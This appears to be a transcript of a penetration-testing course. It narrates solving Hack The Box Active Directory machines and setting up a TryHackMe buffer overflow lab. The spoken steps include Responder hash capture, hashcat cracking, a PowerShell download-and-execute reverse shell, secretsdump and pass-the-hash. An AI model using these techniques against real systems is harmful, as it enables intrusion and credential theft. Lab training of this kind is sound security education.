password, and we can go ahead and crack it. So what we'll do is we will highlight the entire thing. Now, I don't expect you to know this, but whenever you see something inside the group policies, you can know that this hash is going to be the group policies hash. So you can actually type in gpp-decrypt, just like this, and then you should be able just to paste in your hash and then hit enter, and it will go ahead and decrypt that for us. So it tells us this is the password for this account right here. So what we'll do is we'll go ahead and we'll gedit some notes, and we're going to grab this user, paste it in, and then we're going to grab the password so that we have this as well. And now we have those. And what we're going to do, what you would normally do, see, I know where we're going to go because this is really, and I've done this box before, but when you see this SVC TGS, this is telling me this is a ticket granting service, and within Active Directory, you can have tickets for each user, and this right here grants tickets for the user. So if we can somehow grant ourselves a ticket or get a hash, then we get on this box. So that's what ultimately we're going to do, especially when you see this TGS, this ticket granting service. Then you need to be thinking curb roasting or doing something with curb roast. But also something that's really common that you're going to see on Active Directory is this will be a TGT, and it's a ticket granting ticket, and it's the ticket we need in order to get on to the network. So that's a lot of ticket saying, but anytime you're dealing with Active Directory, you're going to hear it a lot. Those are just a couple of little acronyms that you need to be aware of. So with that, what you would do in a normal situation when you don't know what you're doing and you grab a user and a username is you're just going to go ahead and you're going to run SMB map again. So we just go SMB map, and then we're going to go, I think it's a capital U. We'll just type in -- help and make sure that we do this right. So we're going to have a user this time. It is a lowercase u and a lowercase p. So what we will do, it tells us a password or an NTLM hash. This NTLM hash, we're going to see this later. This hash is one that we're going to pull down from an Active Directory network. A domain controller can give us this NTLM hash. Sometimes you can grab these with Responder, which we're also going to see later. So it caught me off guard when I saw that NTLM hash. I didn't realize that was a part of SMB map. So that's interesting. So you can note that. Because we are going to see that later. We're not going to use the hash in order to grab this later, in order to go into SMB map later, but it's always useful to know that we can do this in the future just in case we have this hash and we're not able to crack it. So what this gives us the usage here. So the way we're going to do this is we're going to go SMB map -u, and our username was SVC TGS, and our password was GPP still standing strong. We'll paste that in, and then it looks like we give it the host, which is 10.10.10.100, and then this should run, and it'll tell us if we have access to any other shares that we didn't have access to before. And we do. We have access to users, we have access to sysvol now, we have this net login. And so in a normal situation, what you're going to do is you're going to go ahead and you will look in all of these that we now have read access to, so that we can enumerate some more. But we're actually not going to go that route because that's not the route we need to go. But you just go through and you do the exact same thing we just did in order to find this user and this password, and you just go ahead and look through here and see if you can find any more information that would help you gain access to the network. And so show you real quick, you can see the difference. Up here we anonymously had read only right here, but now that we have a user, we have access to different shares. And this will be helpful. Sometimes you will find a user or you'll have anonymous login and you'll only have access to one share, and then you'll find another user and you'll have access to 2 shares, and then you'll find another user and you'll finally be able to get onto the network. That does happen, and it does take time, and it does take time to go through and enumerate all of these, but you just got to be patient and run through the enumeration the way it's supposed to be done. So I'll see you in the next video. All right, we are going to be doing Courier from Hack the Box, and I believe our IP address is 10.10.10.125, and I've already went ahead and ran the nmap scan for us here, and when we go through it, we see SMB is open right here. We have a Microsoft SQL server open right here. We can see the NetBIOS domain name, the box name, htb.local, querier.htb.local, so we can remember these just in case we need to put something into our Etsy host file. If we get credentials, we can win RM into the machine. And we see SMB signing is enabled but not required, which is good for us. And when we see that with these SMB ports, we can come over here and we can run SMB map. So we'll try SMB map like this, and we'll see what it pulls down. It pulls back nothing, and because that pulls down nothing, we'll go ahead and try SMB client, and we're going to go -N-L like this to see if we have no credentials, no usernames, and then we want it to list the files in here. The thing about SMB client, as I've mentioned before, is it'll list the shares for us, but it will not tell us which ones are readable. So we'll go ahead and run this again. Seems how it did not pull anything down. All right, that took a few tries, but here it is. And you'll see that we have reports, and we have admin C, IPC, and it doesn't tell us what's accessible to us. So what we're going to do is we're just going to run it again, only we're going to see if we can access what's inside the ports. So we'll access it and see what's inside the reports share, and we'll do it just like this. And we'll go ahead and run this, and we have access here, so we can, is it dir, ls? I think both work. Yep. In order for us to get this, because it has these spaces right here, we're going to do an mget, and then we're going to put that inside quotes. If you don't put it inside quotes, it will not recognize what you're trying to get. So we'll put that in quotes. Yes. And we'll go ahead and exit this. We'll ls. And now that we have this, we can look inside of it. But before we're able to look inside of it, because it has this XLSM, this is a Microsoft file, and it has macros enabled. And so enable for us to look at this, we're going to have to either transfer this over to a Windows machine, which we're not going to do, or we can use a tool. So we can come over here and we can go to OLE tools, and it should pull up a GitHub page for us. And what we're going to do, we'll go to this one right here. What we'll do first is, if you're using an older Kali box, you can actually just type in apt search OLE tools, and there should be one in here in the Kali repo. This actually does not work for us because it is not the right file, but if you're using an older Kali machine, there should be one that's like Python OLE tools, and you can use the sudo apt-get. But because this is a new virtual machine, we will need to install it a different way. So we can come back here, go to OLE tools, and it should have installation instructions. Yes, right here. We'll install with this one right here, or for the Linux. So you'll go ahead and copy this and you'll paste it into your terminal. I've already done that. OLEVBA. And this is what we're going to use to read the file. So once that is done installing, it might take a few minutes, but we'll type in OLEVBA once that's done installing, and then we're going to type in the currency volume, and we're going to have to backspace our spaces right here. We'll have to escape them, and we're going to escape them like this. Oh, it did it for us. So if you just start typing currency and then hit tab, it'll autocomplete, and that should allow us to read the file, and it does. So inside this file, we have a password and a user ID of reporting. So this user ID reporting, and this is our password. So what we'll do is copy this. We'll actually copy it without that quote. Copy. We will gedit notes. We'll paste those in so that way we have them, and then we'll cat out the notes, so that way we can just scroll up anytime we need to do this. So the first thing I would try is to automatically come back over here and see what we can do with SMB map and what we can do with SMB client, and see if there's anything else we're able to do. So we'll go SMB client dash U for our user, and it is reporting. And we can go with our dash L for list. We'll use 10, 10, 10, 1, 25. We can leave, we don't need to look into any files, and then we'll hit enter. It might ask us for a password, and we'll copy this, paste, enter, and see what it brings down. And if we have any more access, actually we need to use SMB map for this, because SMB client doesn't tell us if we have read access to anything. SMB map, and it is a lowercase u, and we can actually put the password in here when we're using SMB map. So we can go -p space password. Oh, the -l, we need to get rid of that. We need a -h for the host, and see if we have any read access. It says we have an authentication error, so we don't have the ability to read this just yet. The next thing to do is, now that we have a user, is to see if we can gain access to this server. So the way we're going to do this is we're going to use another impacket tool. So we'll go impacket dash, I think it's MSSQL client. So this is the MySQL client, and then we're going to type in our user, which is reporting, and then we're going to put in the password, which I think is still on my clipboard. It is. Then we're going to type in at the IP address 10.10.10.125, and it says it failed to connect. Oh, the reason this failed is because we need to use a -Windows -auth. Now it allows us to log into MySQL. Now right here, this is the reason I wanted to do this box with you guys, because responder is something you're going to need to know when you're using Active Directory. It is a tool that you will use on a lot of engagements, and this tool is one you're going to see in the future. You'll see it in other boxes, you'll see it in CTFs, so it's one you need to know. And so now that we have access here to the MySQL database, we are going to use responder. But before we do that, we can do our typical enumeration and see if we can show databases, and it doesn't allow us to do this. And so what we're going to do is try and use responder, because if we type in help, it'll tell us what we can do. So you can try and run this enable CMD, and I believe this does not work. Because this doesn't allow us to enable this, we can still try to run commands through the SQL database. And the way we're going to go about this is running it this way. We'll go xp_dir tree, and then we're going to end up throwing some shares through this. It doesn't really matter what share you try and put. What we're trying to do is get the SQL server to respond back to us, and you can put anything here. And our goal is to try and get this to respond back to us, and we're going to steal its NTLM hash with responder. So we're going to go responder. I believe it's a -i, and then we can run a /0, and it will grab automatically our IP address here. And when we run this, must be run as root. It tells us we need a capital I. Now that we have responder running, what responder is going to do is it tell us right here, it is going to listen on this IP, and anytime machine tries to connect to it, it's going to grab the information. So if we run this, we don't need 10.3. Our IP is not 10.3, it is 10.15. Just notice that up here. So we'll send this, and it says it has gone through. We'll check responder, and responder has grabbed the NTLM hash. And so when you look right here, it says the NTLM v2 right here hash. So what we'll end up doing is grabbing this entire hash right here. We can exit out of this. We will gedit hash.txt. We'll paste this in, come back to the front, make sure that it all looks right. We can save that. Now what we'll do is we'll look at our hashcat examples, and we'll look for NTLM v2 right here. It's 5600. And when we run hashcat against this, we're going to go hashcat-m hash.txt, and we'll change this to 5600, and we'll run this. And it's going to tell us we need to send it to the location of rocku.txt. I think I have it in tools, so we'll go Kali, or is it home, Kali, desktop, tools. And now I forgot to specify /rocku.txt. Now that should run, and I'll bring you back when this is done and the hash has been cracked. All right, it has cracked the hash for us. Right here's the password. But before we move on any further, I want to pause and explain what just happened. What we had to do here is we used this SQL server that we were allowed to log into with the credentials we found inside of the reports directory, or file rather. The reports share is what it actually is, inside SMB. And when we got these credentials through that SMB share, we were able to log in through this MySQL server, and we were able to run this command, and then we ran the xdirtree command right here, and we told it, to this SQL server, to go out through this command and go to our IP address, which was right here where we were listening on responder. We were just waiting for some kind of connection, and we told it to go to this share, and this share does not really matter even if it finds it or not. The most important thing is that it tries to connect to our IP address with responder, and responder was sitting here listening, and it was waiting for something to make a connection, and it's actually sitting as a man-in-the-middle attack. It's just listening, and once a machine from the network tries to connect back to responder, it will grab the hash that it's trying to connect with, and that's what it gives us here. And so we have this hash that goes to this SQL server, and then we crack the hash, and now it'll actually tell us this is the user that it was trying to use. So this is the user, the username is what it's trying to connect with, and this is the hash. So we have the username and the hash. And now what we can do is use this username and the password, which we just cracked over here, to try and do further enumeration. So from here, we can go back and try to enumerate with SMB map and see if this is an admin account, but it's not. So to save us time, what we'll do is we will grab this password, and we're going to put it into our notes, so that way we have it. Put this, and then we need the username right here, and we will put it into our notes as well. We'll save it. I did those backwards. I don't usually save them that way, but it'll be okay. Now we can close responder. We can come back over here, and this time we're going to try and connect to the SQL server, but we're going to try and connect through this new user that we have here. We'll come back, and we'll just scroll up and grab this password. Paste, and we're going to type help, and we're going to see if we can get this command shell to work, so that way we can run commands on the box. So we'll paste, and now it says it has enabled for us. So what we can do to test this is copy this right here, and then put in a command. Who am I? And see if it responds. It says we are on the box. So now that we can run commands as this user, we can come over here and now we will set up a netcat listener. But before we do that, we'll cd desktop HTB and we are on Querier and we're going to grab a shell. But before we do that, we need to go to Google. We need to go Nishang GitHub. We're looking for the Nishang PowerShell, and we're going to try and grab the shells off here. Let's see if this has what we are looking for. It does. There's the shells. So we'll actually just grab all of this. We'll just copy. We'll come over here. The place I like to save things is we'll go CD and we'll go backwards, CD opt, and then right here we'll go a git clone. Then we don't have that installed, so we'll do a wget, paste, and this should go out and get everything we need. We will need to sudo this. And now we can ls and we can, all right, that did not grab what we needed. So what we'll do is we'll just come into here and we'll just copy the shell. Where did the shells go? Shells. We need invoke PowerShell TCP PS1. This is what we need. So we'll just copy this and we'll make it our own. We do need, you will want to get these shells, all these shells, or just save it. This one is one you're going to use a lot in the world of getting reverse shells on Windows boxes. But for this case, what we will do is we'll just copy just this one shell and we're going to go gedit and we'll call it shell.ps1 because we're going to run it through PowerShell. We're going to paste, and the one that we are looking for, the example that we're going to change, is this one right here that has the dash reverse. We'll go ahead, copy this, move to the bottom, paste it. Now what we'll change is this here in red. We will delete. We will go our IP address 10.10.10.14.15, port 444 is fine. We'll save this out. We'll come back over to our terminal. We will need to start a netcat listener, or not. We will need a netcat listener too, but we need a HTTP server. Over here, we can put our netcat listener. So we'll just go netcache dash lvmp, delete 4444, and now we are listening. And so what is going to happen when we put our command in here, which you have seen this before, but we haven't run it. So under the Windows shells or getting files on Windows machines, you've seen this before, but we haven't actually run it. What we'll do is we'll go PowerShell, and then we go IEX, and then new object net dot, it's actually new object net dot web client dot download string, and then in here we will go HTTP / our IP address, so that way it will reach out to our IP address to grab our shell.ps1. We can close this off. So when we run this, what's going to happen is this SQL server is going to run this command. It's going to go PowerShell. It's going to run this. It's going to go out to our IP address, grab the shell that we just made. And because we have this server running right here, it is going to grab the shell. It's going to execute it over on the Querier box as this user, our user right here. And then when it executes our payload, it's going to give us a shell back over here, we hope. So we'll go ahead, run this, and see what happens.
Okay, so what it ended up being was we needed to escape these and not have these single quotes here in order to get this to run. All right, we are now on the box and we are going to run power up. We're using PowerShell here, so we'll go ahead and cd back users, and then we can cd into the desktop, and that's where we'll place our shell. I'm going to reconnect because that was going to lag. This is where we'll go paste our PowerShell. We'll cd back, cd users, look and see. We'll cd public, and then we'll cd downloads. And there shouldn't be anything in there, and there's not. So we're going to pull over power up. I'm not sure if we have already put this onto our Kali box, so I'm going to locate power up .ps1, and it looks like we haven't. So now we'll come back to Google and we'll go power up .ps1, and I'm going to show you power up because it is one that you're going to probably run in the future. But normally when you come on a Windows box, the first thing you're going to do is look for, you're going to go linps, who am I, netstat.ano, and you're going to look at all of those things we've already shown. But eventually you're going to run into a bunch of dead ends, and it's going to be time to start running things other than winps. And one of those things is power up, and we have not seen this yet, so we'll go and gedit powerup.ps1, and we'll put this onto our Kali box, and then we will bring it over here and execute it. So what we'll have to do is start up this simple server again, and we're going to go, because we're already in PowerShell, we can just type IEX new dash object, and then it's net dot wherever my dot is dot web client dot download string, and then we're going to put in HTTP and then our IP address, and then powerup.ps1, and then we'll close all this out and cross our fingers and hope I have no typos. It came over and grabbed power up. It should have executed it, and now we will go invoke dash all checks to see what it can pull down for us when it runs this. This might take a minute to run, so I'll go ahead and pause this video and bring you back once it has ran. All right, this is still running, but we'll go ahead and start looking through what PowerUp has found. So if you remember, we pulled this over, and I told you a long time ago to write this out on a note card and memorize it because you're going to need it, and then you can grab these files. And because we're using PowerShell, it doesn't actually pull the file over, it just runs it. And when we see this right here, this SE impersonate privilege, we talked about this earlier as well. This is when you start thinking potato attacks, but we're not going to run that here because there's actually something better. But if you ever see this SE impersonate privilege, you can automatically think potato attacks and start looking at what the architecture is on the box and what year, and determine what potato attack needs to be run. And as we continue to look through here, it tells us what service is running and the path to get there. But what's really interesting right here, it tells us a username, administrator, and then a password right here. And in good fashion, we are going to highlight the password. And I'm not sure if we can exit this yet. We'll just go, and our script hasn't finished running, but that's okay. We'll just stop this simple server here. We will gedit our notes. We'll put in administrator and then the password, save that. We'll close this because it's taking a while to finish, and we'll just reconnect our shell over here. Actually, we don't need that shell anymore. We can stop right here. There's a few things we can do now that we have new credentials. So we'll exit out of that. We can try and do the evil-win-rm and see what we have here. So we'll go evil-win-rm, and we will run a -I, and it's going to be on 10, 10, 10, 125. We have a user with a -u, and the user is administrator, and a -p for the password, which I'm hoping is still in our clipboard, and it is. And we can run this, and it tells us no such word in event. It's possible, because this has these weird characters, we might need to put that in quotes, and it looks like we do. And we can let this run and see if we can come back with an evil-win-rm shell. If not, we have several other ways to go about getting this shell, but I like evil-win-rm because this port is open and it's easy to put files and get files from evil-win-rm. And this didn't work. And so what we can try now is we have impacket, and we can run -ps exec. And if you remember, we have run this before. Let's look at the command. So that way it'll tell us exactly how to run this. We will run ps exec with the domain, the user, the pass, and the target. And you've already seen us run ps exec, and I actually haven't run it on this box. That's something you can go ahead and try and see if it will run. We're going to try a different way to get a shell. It's always good to know multiple different ways to get a shell, just in case you have some fail, like we just had evil-win-rm fail. And so we'll do another impacket tool. We can use impacket, and this is wmi exec, and we will type in the administrator. We better capitalize this to make sure we get it right. Administrator. We'll put in the password, and then we'll go @ and then the IP address 10, 10, 10, 125, and close that off, and see if we can pull down a shell this way. And we can go, who am I? And we are administrator, and we now have administrator access, and you can go anywhere you want on this machine. So this is Querier. The reason I wanted to show you this machine was to show you power up being used and also responder. And it's most important for you to remember responder, because it's one you're going to need to know and you're going to see in the future. So with that, I will see you in the next video. Okay, this is going to be a little bit of an overwhelming video as we cover Bloodhound. But nonetheless, it is something we need to cover, and you can reference in the future whenever you're on an Active Directory network and you need to run Bloodhound for more information. And it kind of gives you a layout of the land. And it's really nice because this specific network isn't overwhelming. There are some networks when you run Bloodhound, it is a convoluted mess, and this is actually a really nice introduction. So when we run Bloodhound, before we run Bloodhound, the first thing we need to do is sudo apt install Bloodhound. So sudo apt install Bloodhound, just like this. We are going to type in yes. And when we install Bloodhound, it's going to go ahead and install the dependencies we need. And one of those is right here, Neo4j, because it's going to use the Neo4j database inside the Bloodhound application. I'm going to go ahead and let this install, and then I'll unpause the video once it has finished. Actually, while this is installing, we'll grab the executable file from Sharphound, the executable file Sharphound from the Bloodhound GitHub page. So we can type in GitHub Bloodhound, and we're going here because we do not want to compile this ourselves. So we can come into GitHub, look at these collections, and right here is the sharphound that we need. So we can copy this link. We're going to save it into this directory. So we'll do a wget on that link. We can ls. There is sharphound, which we will need. It looks like bloodhound is done. So what we will need to do is run neo4j. So we'll go sudo start neo4j. Okay, apparently we don't need that. We can just type in sudo neo4j, and then we're going to type in console, and this should run for us. And once it is up and going, we're going to have to go to neo4j and update our password. So we'll copy this right here. This is the port that it is running on. So we'll copy, come out here, paste it in. And the first time you log in, it's going to make us update our password. So our username automatically is neo4j, and the password is neo4j as well. Don't say password. And now it's going to make us update our password. I'm just going to make my neo, change password, and we are connected. It says we are connected as the user neo4j. Remember the password that you just set, because you're going to need it to log in to your Bloodhound application to run our file that we are about to grab. So now we need to come to our fsmith. We're going to upload the sharphound. So we'll upload sharphound. We'll let that finish. And when that is finished, we're going to run sharphound. So we'll go like this to run it. And sharphound is running, and it is collecting the data that we need. And when it is finished, we will launch this into Bloodhound. So what we'll do is we'll come over here and we'll just type in Bloodhound, and this will launch Bloodhound for us. And we're going to type in neo4j and our password, whatever you changed your password to. I totally typed mine in wrong. And it says we have success, and it's going to log us in. We'll make this smaller because we're going to have to drop in a file once this finishes running. Sharphound has finished running here. I went ahead and looked, made sure it was there. What we'll do is highlight this. You will type in download, and you will download it into your Sauna directory. And I wasn't able to get this to download over here in the download, so I switched over to documents and I re-uploaded Sharphound to this place. I ran it, as you can see up here. Here is the file that came out, and then I was able to successfully download this. What we'll do at this point is come over here to our Bloodhound, come to HTB, and we are in Sauna, and then you just drag this zipped file over here, and it will upload for us. It says it's uploading. I think I hit cleared too early. Might have to do that again. Upload, Sauna, and let those upload. Says they are uploaded. However, my database info, now maybe it has uploaded. We'll come over to analysis, and the one we are looking for, you can click through these and get a feel for what's in here, but the one we're looking for is this one right here, and we will hit upload. And so when you're in these, like if you're in here and you see you're just clicking around, this is RDP, say we can remote desktop in, and you can actually right click and go help and click abuse, and it'll tell you how to go about abusing a specific vulnerability in order to get to the domain controller. So what you're looking for in here is, because this is a DC sync, and we know we have different ways to DC sync in, and it tells us we can go with different users over here. We have 2 users to try this with, so we'll go ahead and close out of Bloodhound. We don't need it anymore now that we see we have that
option. We can close out of that file. We'll shut down Neo4j. We can close out of this. And Impacket actually has a tool for this. So we can go Impacket -secrets dump. And then we will type in the domain. So we have egotistical. I'm actually going to copy it rather than work on typing all that out. We'll go egotistical bank.local. And I can't remember which one of these we were in. Paste that in. We'll go /, and we're going to try that user that we found earlier. So we'll close out of this, and we can cat our notes, and we'll try this user right here. So we'll copy, paste, and then we type in at the IP address we are attacking. It's going to ask us for the password, and we found this as well in our WinPeas script. We'll paste this in, and it tells us we have an error here. All right, I had to pause the video and go look up the proper syntax for the secrets dump, and it looks like this. So we have the Impacket secrets dump, SVC, loan manager, we use our username, and then our password that we found, and it goes at the IP address, and we'll run this. And it's going to grab this ntds.dit. This is a very important file. If you ever come across this, this is something you're going to want to grab and look inside of. And we see now the users, and we have the administrator user, and this is one of the hashes. This hash actually is nothing, so you can see right here AAD3, and that's because Windows doesn't use this hash anymore. So this is the one we want. And you may have heard of a pass the hash attack, but you have not seen it yet. So this is going to be a pass the hash attack. We're going to use it for the first time, and it is also going to be an Impacket -psexec, and we're going to use the egotistical bank, egotistical bank.local / and we're going to go administrator because they are right here. That's where I'm getting that. And it's going to be at the IP address 10.10.10.175. And then we're going to go -hashes because we're going to be using a hash. And then we paste, and I think that it gets pasted in this way, just like that. And it is working for us. So we say, who am I? And we are now authority system. And the reason I pasted the hash in twice, the exact same hash, is because psexec is expecting two hashes. It's expecting this one and this one, but because this AAD3B, you'll see it here, it just stands for nothing. So what we have to do is we have to use the same hash that actually has significance 2 times. And that is the box sauna. So with that, I will see you in the next video. Okay, we are here. We are going to do our last Active Directory box. I saved this one for last because it has a lot of information in it that is related to stuff we have already gone over. I think most everything we are going to go over we have seen, except for Bloodhound, which we're going to do at the very end. And I'm actually going to cut the video so that way in the future, when you encounter an Active Directory box, you can come back to this course and you can click on the video Bloodhound, and you will be able to walk through the usage of Bloodhound, and you're going to be able to come back here and play with Bloodhound on your own and get a better feel for how to use it. But with that, I have already ran the nmap scan, and this is a great Active Directory nmap scan because we see a lot of ports open. We have 445, we have LDAP, we have SMB, we have the WinRM port, we also see Kerberos. So there's a lot going on here, and we also see a web server.
So the first thing we do, as you're accustomed to doing, is running your GoBuster. I'm going to start a derb just because it's easier to run, and it's not, I'm pretty sure this web server doesn't have PHP or anything like that, any extensions needed. So we'll type in 10.10.10.175, so that way we have that running, and we can come to the web server and give it a look around. So we'll look through here and see what's going on. You can click around, so go to the contact us. You can check for different things. Here we do have a .html, which won't matter in our derb. Scan we have running in the background. Go to blogs, see if there is about us. Nothing interesting on the about us. Down here we note that we have a meet the team. There's some people, can't click on them. One of the things to always check if you come to a meet the team, something like this, you can go and look for emails and see if you can enumerate emails, and sometimes they'll shorten these down to like S driver, which we're going to see in a little bit. So the first time I ever did this box, I got really lucky and it actually went super fast. So when we come here, we scroll down, we see SMB signing enabled but not required. So we'll go ahead and go SMB map and type in the host. We'll go 75 and let that run. Nothing. So we can run SMB client -in -l, and we'll run this as 75, and it tells us the connection failed and we don't have access to connect. I always like to test this one more time with those slashes at the beginning, slashes at the end. Sometimes it makes a difference, sometimes it doesn't. And it tells us we can't connect to the SMB client, and we can't use any of our in-packet enumeration because we don't have any users. So the first thing I did when I did this box is about as quick as we have just gone through this. I said I need these users and I need these usernames. First thing I went ahead and did on this box was I grabbed this, and I knew if I could get one of these users, if I could enumerate one of these users, I could pull down a hash. And so I went and I typed in in-packet -get NP users. We can run this with the no pass exactly like this, and we can run the user here, and I went F Smith. There is a tool out here that will run this enumeration for us, which is curb root, and I suggest you go and look at it. It's really simple to use, and if you were trying to enumerate users, you would just go out to Google, grab a list of usernames and run curb root. And I have used it. I let it run one time for like maybe an hour, and it did find several usernames, and it really helped me out on the box I was running. So we can run this. I think that looks right. It was not right. We have to change this right here. We are running egotistical bank, and I copied this right here. We'll get off, make that not highlighted. Where I found that was right here from our in-map scan, egotisticalbank.local, and run this. If it doesn't work, we might need to add that to our Etsy host, and it ran, so it looks like we don't have to. We've already seen this as well in the past. This is the TGT ticket, so we got a ticket granting ticket from the egotistical bank, and now that we have this ticket, we can crack it. So we'll go hashcat. Or actually, we're not ready. We need to gedit hash.txt. We can paste this hash in here and check and make sure it pasted the entire thing. And it did, and we can save this. We've seen this as well in the past. We can come over here and type in this right here, so that way we know what we need to run. And it's right here, 18200. Now we can type in hashcat. Our location for the word list is already saved in there. We can go 18200,
and this should crack the hash for us. So what we'll do is I'll pause this, and then we'll come back once this is cracked, and we will continue on with this box. All right, this has cracked the password for the user F Smith. When I originally did this, we're not going to walk through this right now, but I tried to see if I could get the hash for every single one of these. I went F Smith, S Collins, and you can, the only reason I tried F Smith is because it's really common to use a first initial and a last name when making emails for companies and usernames, and so I went ahead and just typed that in. Like I said, you can use Kerberoot if you're struggling with that, or you can use a tool that'll make a bunch of common usernames with names that you input into that. But I didn't have to do that, and I have used Kerberoot in the past, like I said, so know that you don't have to manually test for this, but this is how I did it when I originally did the box. And it's helpful to know that's just how companies usually label things when you run into this in the future. So we have this hash and we have it cracked. So we'll copy this, we'll come over here, we can close out of that. It's not pulling down anything for us. We can gedit our notes and we can type in F Smith and the password now that we have that. And because we now have a user, one of the things I think we should try to do is we'll go evil winrm and see if we can log in as F Smith. So we'll go evil winrm -I, and we need 10.10.10 for the IP, and it's 175-U F Smith-P, and we'll paste in the password and see if we can get onto this box. And we are able to get on the box, and like our enumeration videos for Windows, we'll go ahead and we'll dir, and somebody has already been on this box and ran it, because we're going to do this here in a little bit. So I actually might revert this box, but we'll go back one directory and we'll actually cd into downloads. Maybe somebody hasn't been in there yet. Cd downloads dir. This directory is empty, so what we're going to do is grab WinPeas and put it onto this machine. And the easiest way to do this is I'm going to cd desktop tools ls. Do we have WinPeas on this box? We do not. So we'll come out here, we'll go winpeas.exe, and we'll grab it off of GitHub. We're on the GitHub page, we scroll down to the release page. Let this load. I like to run WinPeas Annie right here. We can, let's see if we can copy this link. Copy link. I want to put it right here so that way we can just upload it. So we'll do a wget on that link. We can ls, and it is in there. I'm going to change this name because I don't want to type it in with caps. So I'm going to go move WinPeas to winpeas.exe. ls, make sure that name has changed. Come over here, we're going to type in upload WinPeas, and then we'll run that to autocomplete. I'm used to it just saying WinPeas, but it's giving the full path on the box to grab the file. So this is going to upload, and then we'll run WinPeas and see what it pulls down. All right, now it has finished uploading. We can ls, we can see that WinPeas is on here. So we can try to run WinPeas like this, winpeas.exe, and see if this will run, and it is running. I'm going to go ahead and let this run for a minute, and then we'll look at the output as soon as it is finished running. All right, so WinPeas has finished running. So what we'll do here is we'll scroll down and look through some of this information. We have this username, system, not finding a lot of information there. Nothing looks too interesting yet. So we'll keep scrolling. We're on as current user F Smith, current user F Smith.
We see the computer name, administrator, looking for our auto log on credentials. This looks helpful. So we have a default username. So here's a username and a default password. So right here's a password. We have some stored credentials here. So what we can do is copy these. We will gedit the notes once again. We will paste this in and we will save this user right here. And to save us from a bunch of looking through useless files, at this point, what I am going to do is we'll pause this video, and then in the next video, we will install Bloodhound, Neo4j, and run Bloodhound. It's a tool that you're going to hear about a lot, and you're going to see whenever anyone is talking about Active Directory, so it's helpful for you to know what Bloodhound is. So we'll do this in the next video. See you there. Welcome to the buffer overflow portion of this course. I made a slideshow on buffer overflows and went over some of the terminology and how it worked. And when I was rewatching it, I was thinking this would just be confusing and scary if I had never done this before. So I just want to go ahead and say we're going to be going over buffer overflows inside Try Hack Me. There are over 10 buffer overflows that you can practice within Try Hack Me. As we go through these, it's going to sound scary and we're going to use shortened terminology, and I would encourage you just to go ahead and look these things up if you get curious. A lot of what happens, I don't know if you want to know necessarily how things work or just see how it's done. If you want to know how things work, you can go ahead and Google and find out how buffer overflows work and what exactly everything is doing. I'm going to explain the basics as we go through these as to not overwhelm you and to show you that they're really not as difficult as you might think. And so with that, we're going to start in Try Hack Me with an easy buffer overflow on a Windows machine. I'll see you in the next video. Okay, we are here and we are going to be trying to work through this buffer overflow. I am on a Try Hack Me, and so you can actually come in here and start this yourself. You're going to have to come in here to practice buffer overflow. I suggest coming in here to practice buffer overflow because there are 10 different buffer overflows you can work through, and by the time you reach the end, you will be very confident, and it's worth every penny for you to come in here and work through these buffer overflows. So I'm going to show you how to go ahead and get connected to the machine. You'll go ahead and start your machine right here. You'll join the room, you'll click start machine. Then what you're going to do is highlight this in order to RDP into your Windows box for practice, and you can wait until your machine is launched and it'll actually change this down here for you, and you will copy that into your terminal and press enter, and it will start the RDP session for you. Now, one of the things about buffer overflow that is important for you to know as we get started, when we do these buffer overflows, you will have this fuzzing script right here, and you do not need to worry about this. It'll look scary, but they're all pretty much the same. They're all very general. You can Google buffer overflow working concept or proof of concept, and you'll be able to find something similar to this, and it will work just fine. You can actually just save this one right here and use it on future buffer overflows that you run into, because it will run the same. All we're going to do is be changing this right here, and if you were doing this on another machine, you would change the IP address and you would change the port, and so there's a few things you would change. So you can look at proof of concepts on Google. Try Hack Me gives you this crash replication to save us from having to work with two different scripts and then working through all of this separately. What we are going to do is just modify it ourselves. I think it'll help you learn better about what you're doing rather than already having it pre-written for you and then just putting in characters here. I don't think that's very helpful. I think that it's set up for you to struggle in the future. I think it'll help better for you to modify these by yourself
And so with that, in the next video, we're going to go ahead and launch the box and get it set up to begin our buffer overflow. See you there. Here we set after our program has crashed. We know that it's crashed around 2000 bytes. What we need to do now is find exactly where it crashed. So we will come over to a new tab. We will type in msf dash pattern underscore create, and then we're going to type in dash L 2000. If you remember, it says it crashed at 2000 bytes, so we know we need at least 2000 to reach the crash point. This will give us a bunch of characters, and what it does is crash the machine with a specific set of characters. We will copy those over, and then it will tell us exactly how many bytes it took to crash the server. Now that we have that copied, I'll make sure I grab that right. We'll grab this whole thing, copy. We will edit our fuzzer. And what we're going to do is we're just going to call this, make a new variable, and we'll call it offset. And it's going to be a string of all those characters we just created. Now we'll come back over here. We will come back over here and scoot this over. We're going to go plus, and then we're going to add in our offset. And this is going to throw these characters in. It will crash, and it will tell us exactly where this happened. So we will need to restart this server. We'll need to run it. Now that we see down here in the corner, it is running. Come back to our terminal. We're going to run the Python fuzzer again. And it tells us we have an error on line 10. So let's see. Line 10. Did I close it wrong? I did. I used a single quote. That needs to be a double quote. Save. Now we will shoot the fuzzer at it. And it says that it crashed at 2100 bytes. But what we will do is come over to this EIP, copy this. Now we're going to go back to our terminal, and we're going to type in msf dash pattern, and this time we're going to type in offset, and we're going to go with this dash 2000, just like we did last time, dash L 2000, and then we're going to do a queue to query where these exact characters are, and it tells us the exact match at the offset is 1800. So now we should be able to control the EIP, and we will test that in the next video. Paste in this RDP link or script that they've given us. We'll press enter here, and it will launch the session for us, and it will automatically log us into the practice box. The way we're going to go about setting this up is pretty straightforward. I think you can just read through the instructions and it'll tell you, but I'll go and I will save us some time, and what we'll do is we're going to launch Immunity Debugger as administrator, and that should pull up most everything we need. We will open, and then what you'll do is you'll come in here. You might not start right here, but you'll go to admin, desktop, vulnerable apps, OSCP, and that will launch Immunity for us. It'll have everything we need in here, and that is not very pretty, and I am not really sure why, but hopefully it will straighten itself out for us as we go. Okay, now that I've gotten that straightened out, this is what your screen should look like. What we'll do is you'll have to run this every time before you send over your payload, and it'll say running down here in the corner, and so we'll actually have to close this and reopen it every single time because it crashes the box. So if you're ever doing a CTF and you try a buffer overflow exploit and it doesn't work, you're probably going to have to revert the box to start over. So every time you send a buffer overflow, it's going to crash the box. So in a live situation, what you would do is you would have a copy of the software that is running on the victim machine, and you would practice it in your own virtual environment. You would set up your payload, and then you would try to get the reverse shell. In the next video, we will begin our fuzzing now that this is all set up here. But before we do, you'll need to come over to your Linux box, and we will have to netcat. It will tell us we need to use the little command here. We will need to netcat and tell it which box we are running. So we'll netcat, you will type help, and then overflow 1, and then you can type anything there, and it will say that it's complete. This is telling it that we're going to be doing machine number 1 in Try Hack Me. You will need to do this for every single time you do a different one. So next time you would do overflow 2 for the next machine, and so on until you reach the end. So now that that is set 